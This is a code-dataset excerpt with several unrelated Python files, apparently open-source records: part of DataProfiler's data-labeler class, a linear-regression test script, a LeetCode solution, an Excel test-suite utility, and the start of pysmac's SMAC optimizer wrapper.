\"postprocessor\" in params:\n self._postprocessor.set_params(**params[\"postprocessor\"])\n\n self.check_pipeline(\n skip_postprocessor=self._postprocessor is None, error_on_mismatch=False\n )\n\n def add_label(self, label: str, same_as: str = None) -> None:\n \"\"\"\n Add a label to the data labeler.\n\n :param label: new label being added to the data labeler\n :type label: str\n :param same_as: label to have the same encoding index as for multi-label\n to single encoding index.\n :type same_as: str\n :return: None\n \"\"\"\n self._model.add_label(label, same_as)\n\n def set_labels(self, labels: list | dict) -> None:\n \"\"\"\n Set the labels for the data labeler.\n\n :param labels: new labels in either encoding list or dict\n :type labels: list or dict\n :return: None\n \"\"\"\n # convert to valid format\n 
self._model.set_label_mapping(label_mapping=labels)\n\n def predict(\n self,\n data: DataArray,\n batch_size: int = 32,\n predict_options: dict[str, bool] = None,\n error_on_mismatch: bool = False,\n verbose: bool = True,\n ) -> dict:\n \"\"\"\n Predict labels of input data based with the data labeler model.\n\n :param data: data to be predicted upon\n :type data: Union[pd.DataFrame, pd.Series, np.ndarray]\n :param batch_size: batch size of prediction\n :type batch_size: int\n :param predict_options: optional parameters to allow for predict as a\n dict, i.e. dict(show_confidences=True)\n :type predict_options: Dict[str, bool]\n :param error_on_mismatch: if true, errors instead of warns on parameter\n mismatches in pipeline\n :type error_on_mismatch: bool\n :param verbose: Flag to determine whether to print status or not\n :type verbose: bool\n :return: predictions\n :rtype: Dict\n \"\"\"\n if predict_options is None:\n predict_options = {}\n data = self._check_and_return_valid_data_format(data, fit_or_predict=\"predict\")\n\n # check for valid pipeline\n self.check_pipeline(\n skip_postprocessor=False, error_on_mismatch=error_on_mismatch\n )\n\n # preprocess\n samples = self._preprocessor.process(data, batch_size=batch_size)\n\n # predicting:\n results = self._model.predict(\n samples,\n batch_size,\n show_confidences=predict_options.get(\"show_confidences\", False),\n verbose=verbose,\n )\n\n # postprocessing:\n results = self._postprocessor.process(data, results, self.label_mapping)\n\n return results\n\n def set_preprocessor(\n self, data_processor: data_processing.BaseDataPreprocessor\n ) -> None:\n \"\"\"\n Set the data preprocessor for the data labeler.\n\n :param data_processor: processor to set as the preprocessor\n :type data_processor: data_processing.BaseDataPreprocessor\n :return: None\n \"\"\"\n if not isinstance(data_processor, data_processing.BaseDataPreprocessor):\n raise TypeError(\n \"The specified preprocessor was not of the correct\"\n \" type, `DataProcessing`.\"\n )\n self._preprocessor = data_processor\n\n def set_model(self, model: BaseModel) -> None:\n \"\"\"\n Set the model for the data labeler.\n\n :param model: model to use within the data labeler\n :type model: base_model.BaseModel\n :return: None\n \"\"\"\n if not isinstance(model, BaseModel):\n raise TypeError(\n \"The specified model was not of the correct\" \" type, `BaseModel`.\"\n )\n self._model = model\n\n def set_postprocessor(\n self, data_processor: data_processing.BaseDataPostprocessor\n ) -> None:\n \"\"\"\n Set the data postprocessor for the data labeler.\n\n :param data_processor: processor to set as the postprocessor\n :type data_processor: data_processing.BaseDataPostprocessor\n :return: None\n \"\"\"\n if not isinstance(data_processor, data_processing.BaseDataPostprocessor):\n raise TypeError(\n \"The specified postprocessor was not of the \"\n \"correct type, `DataProcessing`.\"\n )\n self._postprocessor = data_processor\n\n def check_pipeline(\n self, skip_postprocessor: bool = False, error_on_mismatch: bool = False\n ) -> None:\n \"\"\"\n Check whether the processors and models connect together without error.\n\n :param skip_postprocessor: skip checking postprocessor is valid in\n pipeline\n :type skip_postprocessor: bool\n :param error_on_mismatch: if true, errors instead of warns on parameter\n mismatches in pipeline\n :type error_on_mismatch: bool\n :return: None\n \"\"\"\n messages = []\n\n def get_parameter_overlap_mismatches(\n param_dict1: dict, param_dict2: dict\n ) -> list[str]:\n 
\"\"\"\n Get mismatching parameters in dictionary if same key exists.\n\n :param param_dict1: 1st set of dictionary of parameters\n :type param_dict1: dict\n :param param_dict2: 2nd set of dictionary of parameters\n :type param_dict2: dict\n :return: list of mismatching parameters\n :rtype: List[str]\n \"\"\"\n param_mismatch_overlaps = []\n for key in param_dict1:\n if key in param_dict2 and param_dict1[key] != param_dict2[key]:\n param_mismatch_overlaps.append(key)\n return param_mismatch_overlaps\n\n model_params = self._model.get_parameters()\n preprocessor_params = self._preprocessor.get_parameters()\n\n mismatch_overlaps = get_parameter_overlap_mismatches(\n model_params, preprocessor_params\n )\n for param in mismatch_overlaps:\n messages.append(\n \"Model and preprocessor value for `{}` do not match. {} != \"\n \"{}\".format(param, model_params[param], preprocessor_params[param])\n )\n\n if not skip_postprocessor:\n postprocessor_params = self._postprocessor.get_parameters()\n mismatch_overlaps = get_parameter_overlap_mismatches(\n model_params, postprocessor_params\n )\n for param in mismatch_overlaps:\n messages.append(\n \"Model and postprocessor value for `{}` do not match. \"\n \"{} != {}\".format(\n param, model_params[param], postprocessor_params[param]\n )\n )\n mismatch_overlaps = get_parameter_overlap_mismatches(\n preprocessor_params, postprocessor_params\n )\n for param in mismatch_overlaps:\n messages.append(\n \"Preprocessor and postprocessor value for `{}` do not \"\n \"match. {} != {}\".format(\n param, preprocessor_params[param], postprocessor_params[param]\n )\n )\n if messages:\n if error_on_mismatch:\n raise RuntimeError(\"\\n\".join(messages))\n warnings.warn(\"\\n\".join(messages), category=RuntimeWarning)\n\n @staticmethod\n def _load_parameters(dirpath: str, load_options: dict = None) -> dict[str, dict]:\n \"\"\"\n Load the data labeler parameters.\n\n :param dirpath: directory where the saved datalabeler exists.\n :type dirpath: str\n :param load_options: optional arguments to include for load i.e. 
class\n for model or processors\n :type load_options: dict\n :return: data labeler parameter dict\n :rtype: Dict[str, Dict]\n \"\"\"\n if not load_options:\n load_options = {}\n\n with open(os.path.join(dirpath, \"data_labeler_parameters.json\")) as fp:\n params: dict[str, dict] = json.load(fp)\n\n if \"model_class\" in load_options:\n model_class = load_options.get(\"model_class\")\n if not isinstance(model_class, BaseModel):\n raise TypeError(\"`model_class` must be a BaseModel\")\n param_model_class = params.get(\"model\", {}).get(\"class\", None)\n if param_model_class != model_class.__class__.__name__:\n raise ValueError(\n \"The load_options model class does not match \"\n \"the required DataLabeler model.\\n {} != {}\".format(\n model_class.__class__.__name__, param_model_class\n )\n )\n params[\"model\"][\"class\"] = model_class\n if \"preprocessor_class\" in load_options:\n processor_class = load_options.get(\"preprocessor_class\")\n if not isinstance(processor_class, data_processing.BaseDataPreprocessor):\n raise TypeError(\n \"`preprocessor_class` must be a \" \"BaseDataPreprocessor\"\n )\n param_processor_class = params.get(\"preprocessor\", {}).get(\"class\", None)\n if param_processor_class != processor_class.__class__.__name__:\n raise ValueError(\n \"The load_options preprocessor class does not \"\n \"match the required DataLabeler preprocessor.\"\n \"\\n {} != {}\".format(\n processor_class.__class__.__name__, param_processor_class\n )\n )\n params[\"preprocessor\"][\"class\"] = load_options.get(\"preprocessor_class\")\n if \"postprocessor_class\" in load_options:\n processor_class = load_options.get(\"postprocessor_class\")\n if not isinstance(processor_class, data_processing.BaseDataPostprocessor):\n raise TypeError(\n \"`postprocessor_class` must be a \" \"BaseDataPostprocessor\"\n )\n param_processor_class = params.get(\"postprocessor\", {}).get(\"class\", None)\n if param_processor_class != processor_class.__class__.__name__:\n raise ValueError(\n \"The load_options postprocessor class does not match \"\n \"the required DataLabeler postprocessor.\\n {} != {}\".format(\n processor_class.__class__.__name__, param_processor_class\n )\n )\n params[\"postprocessor\"][\"class\"] = load_options.get(\"postprocessor_class\")\n return params\n\n def _load_model(\n self, model_class: type[BaseModel] | str | None, dirpath: str\n ) -> None:\n \"\"\"\n Load the data labeler model.\n\n Can be done by either using a provided model class or\n retrieving a registered data labeler model.\n\n :param model_class: class of model being loaded\n :type model_class: Union[Type[BaseModel], str]\n :param dirpath: directory where the saved DataLabeler model exists.\n :type dirpath: str\n :return: None\n \"\"\"\n if isinstance(model_class, str):\n model_class = BaseModel.get_class(model_class)\n\n if not model_class:\n raise ValueError(\n \"`model_class`, {}, was not set in load_options \"\n \"and could not be found as a registered model \"\n \"class in BaseModel.\".format(str(model_class))\n )\n self.set_model(model_class.load_from_disk(dirpath))\n\n def _load_preprocessor(\n self,\n processor_class: type[data_processing.BaseDataProcessor] | str | None,\n dirpath: str,\n ) -> None:\n \"\"\"\n Load the preprocessor for the data labeler.\n\n :param processor_class: class of model being loaded\n :type processor_class: Union[data_processing.BaseDataProcessor, str]\n :param dirpath: directory where the saved DataLabeler model exists.\n :type dirpath: str\n :return: None\n \"\"\"\n if 
isinstance(processor_class, str):\n processor_class = data_processing.BaseDataProcessor.get_class(\n processor_class\n )\n if not processor_class:\n raise ValueError(\n \"`processor_class`, {}, was not set in load_options \"\n \"and could not be found as a registered model \"\n \"class in BaseDataProcessor.\".format(str(processor_class))\n )\n self.set_preprocessor(\n cast(\n data_processing.BaseDataPreprocessor,\n processor_class.load_from_disk(dirpath),\n )\n )\n\n def _load_postprocessor(\n self,\n processor_class: type[data_processing.BaseDataProcessor] | str | None,\n dirpath: str,\n ) -> None:\n \"\"\"\n Load the postprocessor for the data labeler.\n\n :param processor_class: class of model being loaded\n :type processor_class: Union[Type[data_processing.BaseDataPostprocessor], str]\n :param dirpath: directory where the saved DataLabeler model exists.\n :type dirpath: str\n :return: None\n \"\"\"\n if isinstance(processor_class, str):\n processor_class = data_processing.BaseDataProcessor.get_class(\n processor_class\n )\n if not processor_class:\n raise ValueError(\n \"`processor_class`, {}, was not set in \"\n \"load_options and could not be found as a \"\n \"registered model class in BaseDataProcessor.\".format(\n str(processor_class)\n )\n )\n self.set_postprocessor(\n cast(\n data_processing.BaseDataPostprocessor,\n processor_class.load_from_disk(dirpath),\n )\n )\n\n def _load_data_labeler(self, dirpath: str, load_options: dict = None) -> None:\n \"\"\"\n Load and initializes the data data labeler in the given path.\n\n :param dirpath: location of data labeler info files.\n :type dirpath: str\n :param load_options: optional arguments to include for load i.e. class\n for model or processors\n :type load_options: dict\n :return: None\n \"\"\"\n # get loaded parameters\n params = self._load_parameters(dirpath, load_options)\n model_params = params.get(\"model\")\n preprocessor_params = params.get(\"preprocessor\")\n postprocessor_params = params.get(\"postprocessor\")\n\n # setup data labeler based on parameters\n self._load_model(model_params.get(\"class\"), dirpath) # type: ignore\n self._load_preprocessor(\n preprocessor_params.get(\"class\"), dirpath # type: ignore\n )\n self._load_postprocessor(\n postprocessor_params.get(\"class\"), dirpath # type: ignore\n )\n\n @classmethod\n def load_from_library(cls, name: str) -> BaseDataLabeler:\n \"\"\"\n Load the data labeler from the data labeler zoo in the library.\n\n :param name: name of the data labeler.\n :type name: str\n :return: DataLabeler class\n :rtype: BaseDataLabeler\n \"\"\"\n labeler = cls(os.path.join(default_labeler_dir, name))\n labeler._default_model_loc = name\n return labeler\n\n @classmethod\n def load_from_disk(cls, dirpath: str, load_options: dict = None) -> BaseDataLabeler:\n \"\"\"\n Load the data labeler from a saved location on disk.\n\n :param dirpath: path to data labeler files.\n :type dirpath: str\n :param load_options: optional arguments to include for load i.e. 
class\n for model or processors\n :type load_options: dict\n :return: DataLabeler class\n :rtype: BaseDataLabeler\n \"\"\"\n return cls(dirpath, load_options)\n\n @classmethod\n def load_with_components(\n cls,\n preprocessor: data_processing.BaseDataPreprocessor,\n model: BaseModel,\n postprocessor: data_processing.BaseDataPostprocessor,\n ) -> BaseDataLabeler:\n \"\"\"\n Load the data labeler from a its set of components.\n\n :param preprocessor: processor to set as the preprocessor\n :type preprocessor: data_processing.BaseDataPreprocessor\n :param model: model to use within the data labeler\n :type model: base_model.BaseModel\n :param postprocessor: processor to set as the postprocessor\n :type postprocessor: data_processing.BaseDataPostprocessor\n :return: loaded BaseDataLabeler\n :rtype: BaseDataLabeler\n \"\"\"\n data_labeler = type(\"CustomDataLabeler\", (BaseDataLabeler,), {})()\n data_labeler.set_preprocessor(preprocessor)\n data_labeler.set_model(model)\n data_labeler.set_postprocessor(postprocessor)\n return cast(BaseDataLabeler, data_labeler)\n\n def _save_model(self, dirpath: str) -> None:\n \"\"\"\n Save the data labeler model.\n\n :param dirpath: path to save the data labeler\n :type dirpath: str\n :return: None\n \"\"\"\n self._model.save_to_disk(dirpath)\n\n def _save_preprocessor(self, dirpath: str) -> None:\n \"\"\"\n Save the preprocessor for the data labeler.\n\n :param dirpath: path to save the data processor\n :type dirpath: str\n :return: None\n \"\"\"\n self._preprocessor.save_to_disk(dirpath)\n\n def _save_postprocessor(self, dirpath: str) -> None:\n \"\"\"\n Save the postprocessor for the data labeler.\n\n :param dirpath: path to save the data processor\n :type dirpath: str\n :return: None\n \"\"\"\n self._postprocessor.save_to_disk(dirpath)\n\n def _save_parameters(self, dirpath: str) -> None:\n \"\"\"\n Save data labeler-specific parameters.\n\n :param dirpath: location to save the parameters\n :type dirpath: str\n :return: None\n \"\"\"\n parameters = {\n \"model\": {\"class\": self._model.__class__.__name__},\n \"preprocessor\": {\n \"class\": self._preprocessor.__class__.__name__,\n },\n \"postprocessor\": {\n \"class\": self._postprocessor.__class__.__name__,\n },\n }\n with open(os.path.join(dirpath, \"data_labeler_parameters.json\"), \"w\") as fp:\n json.dump(parameters, fp)\n\n def _save_data_labeler(self, dirpath: str) -> None:\n \"\"\"\n Save each component of the data labeler to the specified location.\n\n :param dirpath: path to where to save the data labeler.\n :type dirpath: str\n :return: None\n \"\"\"\n self._save_parameters(dirpath)\n self._save_model(dirpath)\n self._save_preprocessor(dirpath)\n self._save_postprocessor(dirpath)\n\n def save_to_disk(self, dirpath: str) -> None:\n \"\"\"\n Save the data labeler to the specified location.\n\n :param dirpath: location to save the data labeler.\n :type dirpath: str\n :return: None\n \"\"\"\n # note diff from saving to cloud which would create a temp path then\n # delete\n self._save_data_labeler(dirpath)\n\n\nclass TrainableDataLabeler(BaseDataLabeler):\n \"\"\"Subclass of BaseDataLabeler that can be trained.\"\"\"\n\n def fit(\n self,\n x: DataArray,\n y: DataArray,\n validation_split: float = 0.2,\n labels: list | dict | None = None,\n reset_weights: bool = False,\n batch_size: int = 32,\n epochs: int = 1,\n error_on_mismatch: bool = False,\n ) -> list:\n \"\"\"\n Fit the data labeler model for the dataset.\n\n :param x: samples to fit model\n :type x: Union[pd.DataFrame, pd.Series, 
np.ndarray]\n :param y: labels associated with the samples to fit model\n :type y: Union[pd.DataFrame, pd.Series, np.ndarray]\n :param validation_split: split of the data to have as cross-validation\n data\n :type validation_split: float\n :param labels: Encoding or number of labels if refit is needed to new\n labels\n :type labels: Union[list, dict]\n :param reset_weights: Flag to determine whether or not to reset the\n weights\n :type reset_weights: bool\n :param batch_size: Size of each batch sent to data labeler model\n :type batch_size: int\n :param epochs: number of epochs to iterate over the dataset and send to\n the model\n :type epochs: int\n :param error_on_mismatch: if true, errors instead of warns on parameter\n mismatches in pipeline\n :type error_on_mismatch: bool\n :return: model output\n \"\"\"\n # input validation checks\n x = self._check_and_return_valid_data_format(x, fit_or_predict=\"fit\")\n y = self._check_and_return_valid_data_format(y, fit_or_predict=\"fit\")\n\n num_samples = len(x)\n if num_samples == 0 or len(y) == 0:\n raise ValueError(\"No data or labels to fit.\")\n elif num_samples != len(y):\n raise ValueError(\"Data and labels must be the same length.\")\n elif validation_split < 0.0 or validation_split >= 1.0:\n raise ValueError(\"`validation_split` must be >= 0 and less than 1.0\")\n\n # check pipeline\n self.check_pipeline(\n skip_postprocessor=False, error_on_mismatch=error_on_mismatch\n )\n\n # fit to model\n if labels is not None:\n self.set_labels(labels)\n if reset_weights:\n self._model.reset_weights()\n\n # shuffle input data\n shuffle_inds = np.random.permutation(num_samples)\n x = x[shuffle_inds]\n y = y[shuffle_inds]\n\n # free memory\n del shuffle_inds\n\n # preprocess data\n cv_split_index = max(1, int(num_samples * (1 - validation_split)))\n train_data = self._preprocessor.process(\n x[:cv_split_index],\n labels=y[:cv_split_index],\n label_mapping=self.label_mapping,\n batch_size=batch_size,\n )\n cv_data = (\n None\n if not validation_split or cv_split_index < 2\n else self._preprocessor.process(\n x[cv_split_index:],\n labels=y[cv_split_index:],\n label_mapping=self.label_mapping,\n batch_size=batch_size,\n )\n )\n\n results = []\n for i in range(epochs):\n results.append(\n cast(TrainableDataLabeler, self._model).fit(train_data, cv_data)\n )\n if i < epochs - 1:\n # shuffle input data\n shuffle_inds = np.random.permutation(cv_split_index)\n train_data_x = x[shuffle_inds]\n train_data_y = y[shuffle_inds]\n\n # free memory\n del shuffle_inds\n\n train_data = self._preprocessor.process(\n train_data_x,\n labels=train_data_y,\n label_mapping=self.label_mapping,\n batch_size=batch_size,\n )\n cv_data = (\n None\n if not validation_split or cv_split_index < 2\n else self._preprocessor.process(\n x[cv_split_index:],\n labels=y[cv_split_index:],\n label_mapping=self.label_mapping,\n batch_size=batch_size,\n )\n )\n return results\n\n def set_model(self, model: BaseModel) -> None:\n \"\"\"\n Set the model for a trainable data labeler.\n\n Model must have a train function to be able to be set.\n\n :param model: model to use within the data labeler\n :type model: base_model.BaseModel\n :return: None\n \"\"\"\n if not hasattr(model, \"fit\"):\n raise ValueError(\"`model` must have a fit function to be \" \"trainable.\")\n BaseDataLabeler.set_model(self, model)\n\n @classmethod\n def load_with_components(\n cls,\n preprocessor: data_processing.BaseDataPreprocessor,\n model: BaseModel,\n postprocessor: data_processing.BaseDataPostprocessor,\n ) -> 
TrainableDataLabeler:\n \"\"\"\n Load the data labeler from a its set of components.\n\n :param preprocessor: processor to set as the preprocessor\n :type preprocessor: data_processing.BaseDataPreprocessor\n :param model: model to use within the data labeler\n :type model: base_model.BaseModel\n :param postprocessor: processor to set as the postprocessor\n :type postprocessor: data_processing.BaseDataPostprocessor\n :return: loaded TrainableDataLabeler\n :rtype: TrainableDataLabeler\n \"\"\"\n data_labeler = type(\"CustomTrainableDataLabeler\", (TrainableDataLabeler,), {})()\n data_labeler.set_preprocessor(preprocessor)\n data_labeler.set_model(model)\n data_labeler.set_postprocessor(postprocessor)\n return cast(TrainableDataLabeler, data_labeler)\n","repo_name":"capitalone/DataProfiler","sub_path":"dataprofiler/labelers/base_data_labeler.py","file_name":"base_data_labeler.py","file_ext":"py","file_size_in_byte":33092,"program_lang":"python","lang":"en","doc_type":"code","stars":1277,"dataset":"github-code","pt":"21"} +{"seq_id":"70594372852","text":"from sklearn.model_selection import train_test_split\nfrom sklearn import datasets\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom LinearRegressin import LinearRegression\nfrom LinearRegressin import LinearRegression_GD\n\nX, y = datasets.make_regression(n_samples=5000, n_features=1, noise=20, random_state=4)\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=1234)\n\nLR = LinearRegression()\nLR.fit(X_train, y_train)\ny1_test_predict = LR.predict(X_test)\nEout = np.mean( (y1_test_predict - y_test)**2 )\ny_line = LR.predict(X)\n\nLR2 = LinearRegression_GD(lr = 0.0001, n_itr=50000)\nLR2.fit(X_train, y_train)\ny2_test_predict = LR2.predict(X_test)\nEout2 = np.mean( (y2_test_predict - y_test)**2 )\n\nfig = plt.figure(figsize=(8,6))\nplt.plot(X, y_line, color='r')\nplt.scatter(X_train[:,0], y_train, color='b' , marker='o', s=10)\nplt.scatter(X_test[:,0], y_test, color='y', marker='o', s=20 )","repo_name":"maArami/Ml","sub_path":"LinearRegression/LR_test.py","file_name":"LR_test.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12256713791","text":"import bisect\nclass Solution:\n def countSmaller(self, nums: List[int]) -> List[int]:\n sort_nums = []\n ans = []\n for i in nums[::-1]:\n index = bisect.bisect_left(sort_nums, i)\n bisect.insort(sort_nums, i)\n ans.append(index)\n return ans[::-1]","repo_name":"PlutoaCharon/CodeExercise_Python","sub_path":"LeetCode/每日一题/0711-315. 计算右侧小于当前元素的个数.py","file_name":"0711-315. 
计算右侧小于当前元素的个数.py","file_name":"0711-315. 计算右侧小于当前元素的个数.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"}
+{"seq_id":"72907326774","text":"# -*-coding:utf8-*-\n# @auth 小哥哥\n# @time 2020/8/22 10:01\n\n\nfrom datetime import datetime\nimport openpyxl, xlrd\nfrom sktest.common.config import header, keywords, result_col\nfrom sktest.common.globals import g\nfrom pathlib import Path\n\n\nclass Excel:\n\n    def __init__(self, file_path, mode='r'):\n        self.file_path = file_path\n        if mode == 'r':\n            self.workbook = xlrd.open_workbook(file_path)\n\n        elif mode == 'w':\n            self.workbook = openpyxl.load_workbook(file_path)\n\n    def read(self, sheet_name):\n        \"\"\"\n        Read the data of an excel sheet\n        :param sheet_name: name of the sheet tab\n        :return: [[],……]\n        \"\"\"\n        sheet = self.workbook.sheet_by_name(sheet_name)\n        rows = sheet.nrows\n        data = []\n        for i in range(rows):\n            data.append(sheet.row_values(i))\n        return data\n\n    def write(self, sheet_name, data):\n        sheet = self.workbook[sheet_name]\n        for i, v in enumerate(data):\n            sheet.cell(i + 2, result_col, v)\n        self.workbook.save(self.file_path)\n\n    def close(self):\n        self.workbook.close()\n\n\ndef data_to_dict(data):\n    \"\"\"\n    Turn the rows into dicts keyed by the excel header\n    :param data: [[],……]\n    :return: [{},……{}]\n    \"\"\"\n    header_dict = {}\n    dict_data_list = []\n    key = []\n    for i in data[0]:\n        k = i.strip()\n        h = header.get(k, k).lower()\n        key.append(h)\n        header_dict[h] = k\n    for i in data[1:]:\n        data_dict = {}\n        for j in range(len(key)):\n            data_dict[key[j]] = i[j]\n        dict_data_list.append(data_dict)\n    return dict_data_list\n\n\ndef test_suit_format(data):\n    \"\"\"\n    Format the test suite: group the test cases into one suite, e.g.\n    [\n        {'id': 'sktest-1', 'title': '百度搜索', 'condition': '', 'flag': '', 'result': '',\n        'steps': [{'step': '1.0', 'operation': '打开', 'page': '百度', 'element': '百度搜索链接', 'testdata': ''},\n                {'step': '2.0', 'operation': '检查', 'page': '百度', 'element': '页面标题', 'testdata': ''}]},\n        {'id': 'sktest-2', 'title': '打开搜狗', 'condition': '', 'flag': '', 'result': '',\n        'steps': [{'step': '1.0', 'operation': '查看', 'page': '搜狗', 'element': '搜狗页面', 'testdata': ''}]}\n    ]\n    :param data:\n    :return: iter@iterator\n    \"\"\"\n    test_suite = []\n    test_case = {}\n    data = data_to_dict(data)\n    for i in data:\n        if i['id'].strip():\n            if test_case.get('id'):\n                test_suite.append(test_case)\n                test_case = {}\n            for key in ('id', 'title', 'condition', 'flag', 'expected'):\n                test_case[key] = i[key]\n\n            test_case['steps'] = []\n        stp = i['step']\n        if stp:\n            step = {'step': str(stp)}\n            for key in ('operation', 'page', 'element', 'data'):\n                if i[key]:\n                    if i['page']:\n                        g.page = i['page']\n                    else:\n                        i['page'] = g.page\n                    step[key] = i[key]\n            test_case['steps'].append(step)\n    if test_case:\n        test_suite.append(test_case)\n    return test_suite\n    # return iter(test_suite)\n\n\ndef element_format(data):\n    \"\"\"\n    Format the elements; return a dict keyed by page + element\n    :param data:\n    :return: {{},……}\n    \"\"\"\n    elements = {}\n    data = data_to_dict(data)\n    for d in data:\n        if d['page']:\n            g.page = d['page']\n        else:\n            d['page'] = g.page\n        elements[d['page'] + '-' + d['element']] = d\n    return elements\n\n\ndef check_keyword(k):\n    k_ = keywords.get(k)\n    return k_\n\n\ndef format_step_data(step_data):\n    data_dict = {}\n    if step_data:\n        data_list = step_data.split(',')\n        for data in data_list:\n            d_ = data.split('=', 1)\n            if len(d_) == 1:\n                data_dict['text'] = d_[0]\n            elif len(d_) == 2:\n                data_dict[d_[0]] = d_[1]\n            else:\n                raise Exception(\"Error: invalid TestData!\")\n\n    return data_dict\n\n
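# Worked example (illustrative): format_step_data('user=admin,hello') returns\n# {'user': 'admin', 'text': 'hello'} -- comma-separated pairs are split on the\n# first '=', and a bare token is stored under the 'text' key.\n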
\"\"\"\n for step in test_case['steps']:\n step['operation'] = check_keyword(step['operation'])\n step['data'] = format_step_data(step.get('data'))\n\n\ndef get_today():\n now = datetime.now()\n return now.strftime('%Y%m%d')\n\n\ndef mkdir_(directory):\n path_ = Path(directory)\n if not path_.is_dir():\n path_.mkdir(parents=True)\n return str(path_)\n\n\nif __name__ == '__main__':\n # e = Excel(r'D:\\Desktop\\Excel File\\sktest.xlsx', mode='r')\n # print('==' * 20)\n # print(testsuit_format(e.read('case')))\n # print(element_format(e.read('elements')))\n\n pass\n","repo_name":"cxyboy/sktest","sub_path":"common/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":4824,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"73028139253","text":"from __future__ import print_function, division, absolute_import\n\nimport sys\nimport tempfile\nimport os\nimport shutil\nimport errno\nimport operator\nimport multiprocessing\nimport logging\nimport csv\n\nfrom .utils.smac_output_readers import read_trajectory_file\nimport pysmac.remote_smac\nfrom .utils.multiprocessing_wrapper import MyPool\nfrom pysmac.utils.java_helper import check_java_version, smac_classpath\n\n\nclass SMAC_optimizer(object):\n \"\"\"\n The main class of pysmac instanciated by the user.\n \n This is the class a user instanciates to use SMAC. Constructing the\n object does not start the minimization immediately. The user has to\n call the method minimize for the actual optimization. This design\n choice enables easy enough usage for novice users, but allows experts\n to change many of SMAC's parameters by editing the 'smac_options' dict\n \"\"\"\n\n\n smac_options = {}\n \"\"\" A dict associated with the optimizer object that controlls options\n mainly for SMAC\n \"\"\"\n\n\n\n # collects smac specific data that go into the scenario file\n def __init__(self, t_limit_total_s=None, mem_limit_smac_mb=None, working_directory = None, persistent_files=False, debug = False):\n \"\"\"\n \n :param t_limit_total_s: the total time budget (in seconds) for the optimization. None means that no wall clock time constraint is enforced.\n :type t_limit_total_s: float\n :param mem_limit_smac_mb: memory limit for the Java Runtime Environment in which SMAC will be executed. None means system default.\n :type mem_limit_smac_mb: int\n :param working_directory: directory where SMACs output files are stored. None means a temporary directory will be created via the tempfile module.\n :type working_directory: str\n :param persistent_files: whether or note these files persist beyond the runtime of the optimization.\n :type persistent_files: bool\n :param debug: set this to true for debug information (pysmac and SMAC itself) logged to standard-out. 
\n :type debug: bool\n \"\"\"\n \n self.__logger = multiprocessing.log_to_stderr()\n if debug:\n self.__logger.setLevel(debug)\n else:\n self.__logger.setLevel(logging.WARNING)\n \n self.__t_limit_total_s = 0 if t_limit_total_s is None else int(t_limit_total_s)\n self.__mem_limit_smac_mb = None if (mem_limit_smac_mb is None) else int(mem_limit_smac_mb)\n \n self.__persistent_files = persistent_files\n \n # some basic consistency checks\n\n if (self.__t_limit_total_s < 0):\n raise ValueError('The total time limit cannot be negative!')\n if (( self.__mem_limit_smac_mb is not None) and (self.__mem_limit_smac_mb <= 0)):\n raise ValueError('SMAC\\'s memory limit has to be either None (no limit) or positive!')\n\n \n # create a temporary directory if none is specified\n if working_directory is None:\n self.working_directory = tempfile.mkdtemp()\n else:\n self.working_directory = working_directory\n \n self.__logger.debug('Writing output into: %s'%self.working_directory)\n \n # make some subdirs for output and smac internals\n self.__exec_dir = os.path.join(self.working_directory, 'exec')\n self.__out_dir = os.path.join(self.working_directory, 'out' )\n\n for directory in [self.working_directory, self.__exec_dir, self.__out_dir]:\n try:\n os.makedirs(directory)\n except OSError as exception:\n if exception.errno != errno.EEXIST:\n raise\n \n \n # Set some of the smac options\n # Most fields contain the standard values (as of SMAC 2.08.00).\n # All options from the smac manual can be accessed by\n # adding an entry to the dictionary with the appropriate name.\n # Some options will however have, at best, no effect, setting\n # others may even break the communication.\n self.smac_options = {\n 'algo-exec': 'echo 0',\n 'run-obj': 'QUALITY',\n 'validation': False,\n 'cutoff_time': 3600,\n 'intensification-percentage': 0.5,\n 'numPCA': 7,\n 'rf-full-tree-bootstrap': False,\n 'rf-ignore-conditionality':False,\n 'rf-num-trees': 10,\n 'skip-features': True,\n 'pcs-file': os.path.join(self.working_directory,'parameters.pcs'),\n 'instances': os.path.join(self.working_directory ,'instances.dat'),\n 'algo-exec-dir': self.working_directory,\n 'output-dir': self.__out_dir,\n 'console-log-level': 'OFF',\n 'abort-on-first-run-crash': False,\n 'overall_obj': 'MEAN',\n 'scenario_fn': 'scenario.dat', # NOT a SMAC OPTION, but allows to\n # change the standard name (used\n # in Spysmac)\n 'java_executable': 'java', # NOT a SMAC OPTION; allows to \n # specify a different java\n # binary and can be abused to \n # pass additional arguments to it\n 'timeout_quality':2.**127, # not a SMAC option either\n # customize the quality reported\n # to SMAC in case of a timeout\n }\n if debug:\n self.smac_options['console-log-level']='INFO'\n\n def __del__(self):\n \"\"\"\n Destructor cleaning up after SMAC finishes depending on the persistent_files flag.\n \"\"\"\n if not self.__persistent_files:\n shutil.rmtree(self.working_directory)\n\n def minimize(self, func, max_evaluations, parameter_dict, \n conditional_clauses = [], forbidden_clauses=[],\n deterministic = True,\n num_train_instances = None, num_test_instances = None,\n train_instance_features = None,\n num_runs = 1, num_procs = 1, seed = 0,\n mem_limit_function_mb=None, t_limit_function_s= None):\n \"\"\"\n Function invoked to perform the actual minimization given all necessary information.\n \n :param func: the function to be called\n :type func: callable\n :param max_evaluations: number of function calls allowed during the optimization (does not include optional 
